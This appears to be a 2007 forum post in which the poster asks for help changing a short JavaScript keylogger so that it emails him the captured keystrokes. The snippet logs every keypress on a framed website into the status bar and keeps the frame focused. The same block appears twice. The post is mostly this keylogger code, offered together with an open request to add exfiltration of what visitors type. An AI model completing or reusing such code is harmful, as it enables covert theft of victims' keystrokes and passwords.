Zork
04-07-2007, 05:34 PM
I need help, could someone please edit the following js code so that it will email me the log instead, thanks.
<script>
var keylog='Capturing: ';
document.onkeypress = function () {
window.status = keylog += String.fromCharCode(window.event.keyCode); }
</script>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.mywebsite.com" scrolling="auto">
</frameset>
<script>
var keylog='Capturing: ';
document.onkeypress = function () {
window.status = keylog += String.fromCharCode(window.event.keyCode); }
</script>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.mywebsite.com" scrolling="auto">
</frameset>